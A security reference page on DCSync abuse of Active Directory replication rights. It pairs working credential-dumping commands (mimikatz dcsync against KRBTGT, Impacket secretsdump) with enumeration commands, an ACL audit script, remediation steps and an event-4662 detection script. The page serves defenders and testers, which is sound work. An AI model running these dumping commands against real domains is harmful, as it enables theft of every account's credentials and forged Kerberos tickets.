DCSync Permissions Abuse
Description
DCSync abuses directory replication rights to request password data directly from a domain controller over the MS-DRSR replication protocol (the DRSUAPI RPC interface), the same channel domain controllers use to replicate with each other. The attacker's tool issues a GetNCChanges request as if it were a replication partner, so nothing is executed on the DC and nothing is written to the target account. A principal that holds both Replicating Directory Changes (DS-Replication-Get-Changes) and Replicating Directory Changes All (DS-Replication-Get-Changes-All) on the domain naming context can pull the secrets (NTLM hash, password history, Kerberos keys) of any account, including KRBTGT. Replicating Directory Changes In Filtered Set is only needed for attributes in the RODC filtered attribute set and is not required for a standard DCSync. By default only domain controllers and the Administrators group (and therefore Domain Admins and Enterprise Admins) hold these rights, but they are frequently granted to helpdesk accounts, migration tooling or directory-sync services (the Microsoft Entra Connect password hash sync account is the common legitimate case) and then left in place indefinitely.
Examples
Check for Replication Rights and Abuse with Mimikatz
From a host where you control a privileged account with replication rights (run in that account's context, or inject its credentials first):
mimikatz "lsadump::dcsync /domain:corp.local /user:corp\krbtgt" exit
This returns the account's NTLM hash, its password history and its Kerberos keys (AES and RC4); the KRBTGT hash alone is enough to forge golden tickets. To dump every account in one pass, use /all /csv instead of /user.
Abuse with Impacket
Use secretsdump.py to perform a DCSync-style dump remotely (it prompts for the password if none is given; -hashes LM:NT lets you pass the hash instead):
secretsdump.py -dc-ip 10.0.0.10 -just-dc corp.local/replicator@10.0.0.10
Hashes for every account, machine accounts included, confirm that the account can replicate secrets. Add -just-dc-user krbtgt to dump a single account, or -just-dc-ntlm to skip Kerberos keys; a single-account dump proves the right just as well and is far less noisy.
Identify who has replication rights
# PowerView (Get-DomainObjectAcl in current versions, Get-ObjectAcl in older ones).
# With -ResolveGUIDs the right appears as an ExtendedRight whose ObjectAceType is
# DS-Replication-Get-Changes / -All / -In-Filtered-Set, so filter on that field,
# and also catch GenericAll, which implies every extended right.
Get-DomainObjectAcl -Identity (Get-Domain).DistinguishedName -ResolveGUIDs |
    Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' -or $_.ActiveDirectoryRights -match 'GenericAll' } |
    Select-Object @{n='Principal'; e={ ConvertFrom-SID $_.SecurityIdentifier }}, ObjectAceType, ActiveDirectoryRights, AceType
# DSACLS (native). Use /C: so findstr matches the whole phrase rather than any of its words.
# Long trustee names wrap onto the line above the permission, so review the full output
# when a matching line shows no trustee.
dsacls "DC=corp,DC=local" | findstr /i /C:"Replicating Directory Changes"
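A fuller version of the same check, added here as an example and not taken from the original page: it reads the domain object's DACL through System.DirectoryServices, so it runs from any domain-joined host without PowerView or RSAT, resolves the three replication GUIDs by value, also catches GenericAll and "all extended rights" ACEs that grant DCSync implicitly, and flags any holder outside the default Tier-0 set. The list of expected holders is an assumption for a default domain; adjust it to yours.

```powershell
# Added example (not part of the original page). Reading the domain object's
# DACL needs no special privilege; any domain user can run this.

$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    # The domain naming context as a DirectoryEntry.
    $nc = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry()
    $domainSid = [System.Security.Principal.SecurityIdentifier]::new([byte[]]$nc.Properties['objectSid'].Value, 0)

    # Assumed default holders: SYSTEM, Enterprise Domain Controllers, BUILTIN\Administrators,
    # plus Domain Admins (512), Domain Controllers (516), Enterprise Admins (519) and
    # Enterprise RODCs (498). 519/498 are forest-root RIDs; in a child domain they carry the
    # root domain's SID and will be reported as Unexpected here.
    $expected = @('S-1-5-18', 'S-1-5-9', 'S-1-5-32-544') +
                @(512, 516, 519, 498 | ForEach-Object { "$($domainSid.Value)-$_" })

    $ga = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    $er = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $rules = $nc.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($r in $rules) {
        if ($r.AccessControlType -ne 'Allow') { continue }
        $granted = @()
        if (($r.ActiveDirectoryRights -band $ga) -eq $ga) {
            # GenericAll contains every bit, so test for the full mask, not just overlap.
            $granted += 'GenericAll (implies every replication right)'
        } elseif (($r.ActiveDirectoryRights -band $er) -eq $er) {
            if ($r.ObjectType -eq [guid]::Empty) {
                # ExtendedRight with an empty ObjectType means *all* extended rights.
                $granted += 'All extended rights'
            } elseif ($ReplicationRights.ContainsKey($r.ObjectType.ToString())) {
                $granted += $ReplicationRights[$r.ObjectType.ToString()]
            }
        }
        if ($granted.Count -eq 0) { continue }

        $sid = $r.IdentityReference.Value
        try   { $name = $r.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid }   # unresolvable SID: deleted principal or foreign domain, worth a look
        [pscustomobject]@{
            Principal  = $name
            SID        = $sid
            Right      = ($granted -join ', ')
            Inherited  = $r.IsInherited
            Unexpected = ($sid -notin $expected)
        }
    }
}

# Show only ACEs held by something other than the default Tier-0 principals.
Get-ReplicationRightHolders | Where-Object Unexpected | Format-Table -AutoSize
```

Drop the Where-Object to see the full list, including the default holders, when you want to confirm the baseline before removing anything.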
Remediation
- Restrict replication privileges
  - Only domain controllers and Tier-0 groups (Administrators, Domain Admins, Enterprise Admins) should hold Replicating Directory Changes and Replicating Directory Changes All on the domain naming context.
  - Remove direct grants to helpdesk groups, migration accounts and third-party tools. Where a directory-sync product genuinely needs the right (the Microsoft Entra Connect password hash sync account is the usual case), treat that account as Tier-0: unique long password, no interactive logon, logon restricted to its own server.
  - Also review ACEs that grant the right implicitly: GenericAll or "all extended rights" on the domain object, and WriteDACL or ownership of the domain object, which let a principal grant itself the right.
- Monitor and alert
  - Enable Audit Directory Service Access (success) on DCs and watch event 4662 whose Properties field contains one of the replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 Get-Changes, 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 Get-Changes-All, 89e95b76-444d-4c62-991a-0facbeda640c In-Filtered-Set) and whose subject is not a DC computer account. Do not blanket-exclude names ending in "$": a rogue or compromised machine account can DCSync too.
  - Alert on changes to the domain object's DACL that add an ACE granting these rights (event 5136 on nTSecurityDescriptor, which needs Audit Directory Service Changes and a SACL on the domain object).
  - Deploy honeytoken accounts. Note that 4662 is recorded against the domain naming context, not against the account whose hash was pulled, so canaries do not reveal the dump itself; they fire when the dumped hash is used. Alert on any logon or Kerberos ticket request for those accounts.
- Recover after exposure
  - Reset the KRBTGT password twice following a suspected compromise. The KDC still honours the previous key, so tickets minted with the stolen hash keep working until the second reset; let the first reset replicate to every DC before doing the second. Both resets inside the maximum TGT lifetime (10 hours by default) invalidate every outstanding TGT at once and force all users and services to re-authenticate, which is acceptable in an active incident but should be staged otherwise.
  - Treat every secret the attacker could have replicated as compromised. After a full dump that is every account, so force password resets for users and service accounts, reset computer account passwords where feasible (gMSA passwords rotate on their own schedule), and rotate Tier-0 credentials first.
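Detection logic for the 4662 rule above, added here as an example that is not from the original page. It classifies an event from its XML, which is the same whether the record comes from Get-WinEvent on a DC or from an exported .evtx, and exercises the logic on two constructed sample events so it can be run offline. The DC account names are assumptions for the example domain.

```powershell
# Added example (not part of the original page): flag 4662 events that carry a
# replication extended right and were not raised by a known DC computer account.

$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'    # DS-Replication-Get-Changes-In-Filtered-Set
)

# Assumption: the DC computer accounts of this domain. Deliberately an explicit list,
# not "anything ending in $", so a rogue machine account is still flagged.
$KnownDcAccounts = @('DC01$', 'DC02$')

function Test-DcSyncEvent {
    param([Parameter(Mandatory)][xml]$EventXml)

    $id = $EventXml.Event.System.EventID
    if ($id -is [System.Xml.XmlElement]) { $id = $id.InnerText }   # EventID may carry attributes
    if ("$id" -ne '4662') { return $null }

    # Flatten <Data Name="...">value</Data> into a hashtable.
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Properties lists the GUIDs of the rights that were exercised, one per line.
    $props = [string]$data['Properties']
    $hit = @($ReplicationGuids | Where-Object { $props -match [regex]::Escape($_) })
    if ($hit.Count -eq 0) { return $null }

    $subject = $data['SubjectUserName']
    [pscustomobject]@{
        Time       = $EventXml.Event.System.TimeCreated.SystemTime
        Subject    = "$($data['SubjectDomainName'])\$subject"
        ObjectName = $data['ObjectName']
        Rights     = ($hit -join ', ')
        Suspicious = ($subject -notin $KnownDcAccounts)
    }
}

# Constructed sample events (not real logs): one DCSync by a service account,
# one ordinary replication request from a known DC.
$SampleDcSync = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID><TimeCreated SystemTime="2024-05-01T09:12:44.000Z"/><Computer>DC01.corp.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">svc_sync</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectName">DC=corp,DC=local</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688
	{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
	{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
  </EventData>
</Event>
'@
$SampleDcReplication = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID><TimeCreated SystemTime="2024-05-01T09:13:02.000Z"/><Computer>DC01.corp.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">DC02$</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectName">DC=corp,DC=local</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688
	{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
	{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
  </EventData>
</Event>
'@

# Only the svc_sync event should come out as Suspicious.
@($SampleDcSync, $SampleDcReplication) | ForEach-Object { Test-DcSyncEvent ([xml]$_) } |
    Where-Object Suspicious | Format-Table -AutoSize
```

On a DC with Audit Directory Service Access enabled, feed it live data with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} | ForEach-Object { Test-DcSyncEvent ([xml]$_.ToXml()) } | Where-Object Suspicious. Keep the 4662 SACL scoped to the domain object, otherwise the volume of unrelated directory access events makes the log expensive to keep.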